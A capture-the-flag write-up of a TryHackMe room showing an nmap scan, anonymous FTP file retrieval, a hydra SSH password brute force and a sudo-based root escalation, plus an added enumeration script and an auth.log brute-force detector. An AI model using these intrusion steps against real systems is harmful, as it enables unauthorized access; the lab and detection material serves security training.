https://tryhackme.com/room/cowboyhacker

💭 Thoughts after doing the room

This room was a little bit odd because I didn’t really get the L (O)MEGALUL RE. The contents of the HTTP server didn’t play any role in the rest of the process. Sometimes the rooms labeled as easy already require a lot of knowledge, but this one was really on the easier side.

Task 1 Living up to the title

Deploy the machine.

YEP

Find open ports on the machine

Nmap scan of the default ports with the aggressive timing template (-T4)

root@ip-10-10-24-237:~# IP=10.10.145.177
root@ip-10-10-24-237:~# nmap -T4 $IP

Starting Nmap 7.60 ( https://nmap.org ) at 2023-03-29 20:27 BST
Nmap scan report for ip-10-10-145-177.eu-west-1.compute.internal (10.10.145.177)
Host is up (0.00033s latency).
Not shown: 967 filtered ports, 30 closed ports
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
MAC Address: 02:CF:B3:AC:55:A7 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 16.16 seconds

Who wrote the task list?

Port 80 was open, so I checked whether there is a website; it doesn’t reveal anything directly as far as I can tell.

The FTP port was also open, so check for anonymous FTP login.

Download both files found there:

root@ip-10-10-24-237:~# ftp $IP
Connected to 10.10.145.177.
220 (vsFTPd 3.0.3)
Name (10.10.145.177:root): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-rw-r--    1 ftp      ftp           418 Jun 07  2020 locks.txt
-rw-rw-r--    1 ftp      ftp            68 Jun 07  2020 task.txt
226 Directory send OK.
ftp> get locks.txt
local: locks.txt remote: locks.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for locks.txt (418 bytes).
226 Transfer complete.
418 bytes received in 0.08 secs (5.4071 kB/s)
ftp> get task.txt
local: task.txt remote: task.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for task.txt (68 bytes).
226 Transfer complete.
68 bytes received in 0.00 secs (120.0836 kB/s)
ftp> exit
221 Goodbye.

locks.txt seems to contain passwords

root@ip-10-10-24-237:~# cat locks.txt 
rEddrAGON
ReDdr4g0nSynd!cat3
Dr@gOn$yn9icat3
R3DDr46ONSYndIC@Te
ReddRA60N
R3dDrag0nSynd1c4te
[...]

task.txt has two lines and is signed with the name we’re looking for:

root@ip-10-10-24-237:~# cat task.txt 
1.) Protect Vicious.
2.) Plan for Red Eye pickup on the moon.

-🀐
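The recon steps above (nmap for open ports, the anonymous FTP login, pulling every file from the FTP root) as one non-interactive script. This is an added example, not code from the original writeup; it assumes nmap and curl are installed and takes the target IP as its first argument. The network functions only run when an IP is given, so the file can be executed offline to exercise the nmap-output parser on the constructed sample at the bottom.

```shell
#!/bin/sh
# Added example, not part of the original writeup. Assumes nmap and curl are
# installed; the target IP comes from the first argument. Network functions
# only run when an IP is given, so the file can also run offline.

# Extract the port/proto entries nmap reported as "open" from its normal
# (human-readable) output on stdin. Prints them space-separated on one line,
# e.g. "21/tcp 22/tcp 80/tcp". Works with and without -sV (STATE stays column 2).
open_ports() {
    awk '$2 == "open" && $1 ~ /^[0-9]+\/(tcp|udp)$/ { printf "%s%s", sep, $1; sep = " " }
         END { print "" }'
}

# Directory listing of the FTP root as the anonymous user. curl exits
# non-zero (67) when the server refuses the login, so this doubles as the
# "is anonymous allowed?" check.
ftp_anon_list() {
    curl -s --max-time 15 --user anonymous:anonymous "ftp://$1/"
}

# Download every regular file in the anonymous FTP root into ./loot/<ip>/.
# The LIST output is parsed like "ls -l": lines starting with "-" are files,
# the last field is the name (file names containing spaces are not handled).
ftp_anon_fetch_all() {
    ip=$1
    dir="loot/$ip"
    mkdir -p "$dir"
    ftp_anon_list "$ip" | awk '$1 ~ /^-/ { print $NF }' | while read -r name; do
        curl -s --user anonymous:anonymous -o "$dir/$name" "ftp://$ip/$name" \
            && echo "fetched $name -> $dir/$name"
    done
}

# Scan, then act on what is open: only FTP gets an automatic follow-up here;
# SSH and HTTP are just reported for manual work (hydra, browser).
run_enum() {
    ip=$1
    ports=$(nmap -T4 "$ip" | open_ports)
    echo "open ports on $ip: $ports"
    case " $ports " in
        *" 21/tcp "*)
            if ftp_anon_list "$ip" >/dev/null 2>&1; then
                echo "anonymous FTP login accepted, mirroring files"
                ftp_anon_fetch_all "$ip"
            else
                echo "anonymous FTP login refused"
            fi ;;
    esac
}

# Constructed sample of nmap output (modelled on the scan above, with one
# extra closed port) so the parser can be exercised without a target.
SAMPLE_NMAP='Starting Nmap 7.60 ( https://nmap.org )
Nmap scan report for 10.10.145.177
Host is up (0.00033s latency).
Not shown: 996 filtered ports
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
25/tcp closed smtp
80/tcp open  http
MAC Address: 02:CF:B3:AC:55:A7 (Unknown)'

printf '%s\n' "$SAMPLE_NMAP" | open_ports   # prints: 21/tcp 22/tcp 80/tcp

if [ $# -ge 1 ]; then
    run_enum "$1"
fi
```

Run it as `sh enum.sh 10.10.145.177` to repeat the steps above without the interactive ftp client; the downloaded files land in `loot/<ip>/`. Adding `-sV` to the nmap call would also capture the banner (vsFTPd 3.0.3 in the FTP session above) without changing how the parser reads the output.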

What service can you bruteforce with the text file found?

Because of the wording of the question, I’m thinking SSH rather than the web server. So I’ll try it with the name we got and the password list.

What is the users password?

I accidentally first ran the hydra command with the RockYou wordlist instead of the password file we found, which is why there is output about a previous session.

root@ip-10-10-24-237:~# hydra -l 🀐 -P locks.txt $IP ssh
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2023-03-29 20:37:51
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 26 login tries (l:1/p:26), ~2 tries per task
[DATA] attacking ssh://10.10.145.177:22/
[22][ssh] host: 10.10.145.177   login: 🀐   password: 🀐
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 16 targets did not complete
Hydra (http://www.thc.org/thc-hydra) finished at 2023-03-29 20:38:04
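The same hydra run seen from the target’s side, as an added example that is not part of the original writeup. sshd logs one "Failed password" line per rejected attempt and an "Accepted password" line for the hit, so a short password list tried at 16 parallel tasks shows up in auth.log as a burst of failures from one source IP followed by a success. The log lines are constructed to mimic the auth.log format; the user name "exampleuser", the PIDs, ports and timestamps are placeholders.

```shell
#!/bin/sh
# Added example, not part of the original writeup: detect a password-guessing
# burst against sshd in auth.log-style lines. The sample lines below are
# constructed; "exampleuser", PIDs, ports and timestamps are placeholders.

# Read sshd log lines on stdin; print one line per source IP with at least
# THRESHOLD failed password attempts, noting whether a password login from
# that IP was accepted after the failures began. Output is sorted by IP.
flag_ssh_bruteforce() {
    awk -v thr="$1" '
        # Source IP is the field after "from" in both message variants
        # ("Failed password for USER from IP" and
        #  "Failed password for invalid user USER from IP").
        function src_ip(    i) { for (i = 1; i <= NF; i++) if ($i == "from") return $(i + 1); return "" }
        /sshd\[[0-9]+\]: Failed password for/   { fail[src_ip()]++ }
        /sshd\[[0-9]+\]: Accepted password for/ { ip = src_ip(); if (fail[ip] > 0) hit[ip] = 1 }
        END {
            for (ip in fail)
                if (fail[ip] >= thr)
                    printf "%s failed=%d accepted_after_failures=%s\n", ip, fail[ip], (ip in hit) ? "yes" : "no"
        }' | sort
}

# Constructed sample: six rejected guesses and then a hit from the attacker,
# one stray failure from another host, and an unrelated key-based login.
SAMPLE_LOG='Mar 29 20:37:51 bountyhacker sshd[1201]: Failed password for exampleuser from 10.10.24.237 port 40110 ssh2
Mar 29 20:37:51 bountyhacker sshd[1203]: Failed password for exampleuser from 10.10.24.237 port 40112 ssh2
Mar 29 20:37:52 bountyhacker sshd[1205]: Failed password for exampleuser from 10.10.24.237 port 40114 ssh2
Mar 29 20:37:52 bountyhacker sshd[1207]: Failed password for exampleuser from 10.10.24.237 port 40116 ssh2
Mar 29 20:37:53 bountyhacker sshd[1209]: Failed password for exampleuser from 10.10.24.237 port 40118 ssh2
Mar 29 20:37:53 bountyhacker sshd[1211]: Failed password for exampleuser from 10.10.24.237 port 40120 ssh2
Mar 29 20:37:54 bountyhacker sshd[1213]: Accepted password for exampleuser from 10.10.24.237 port 40122 ssh2
Mar 29 20:38:10 bountyhacker sshd[1220]: Failed password for invalid user admin from 198.51.100.7 port 51000 ssh2
Mar 29 20:40:00 bountyhacker sshd[1230]: Accepted publickey for exampleuser from 192.0.2.10 port 52000 ssh2'

printf '%s\n' "$SAMPLE_LOG" | flag_ssh_bruteforce 5
# prints: 10.10.24.237 failed=6 accepted_after_failures=yes
```

On a real box you would feed it `grep sshd /var/log/auth.log | flag_ssh_bruteforce 10`; the per-IP failure count is the same signal fail2ban keys on. The hydra warnings above ("2 final worker threads did not complete", "16 targets did not complete") are the attacker-side symptom of sshd throttling concurrent unauthenticated connections (MaxStartups): some of the 26 tries may never have completed, so if a run like this finds nothing, rerun with `-t 4` as hydra itself suggests before concluding the password is not in the list.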

user.txt

It’s right there in the directory you’re in after logging in.

🀐@bountyhacker:~/Desktop$ ls
user.txt
🀐@bountyhacker:~/Desktop$ cat user.txt 
THM{🀐}

root.txt

One of the first things I check manually is sudo -l, to see whether I can run anything as root.

🀐@bountyhacker:~/Desktop$ sudo -l
[sudo] password for 🀐: 
Matching Defaults entries for 🀐 on bountyhacker:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User 🀐 may run the following commands on bountyhacker:
    (root) /bin/🀐
🀐@bountyhacker:~/Desktop$

Yes, there is one. So I go to GTFOBins and look up how that command can be abused with sudo to get a root shell:

🀐@bountyhacker:~/Desktop$ sudo 🀐 
tar: Removing leading `/' from member names
# whoami
root
# cd /root 
# ls
root.txt
# cat root.txt
THM{🀐}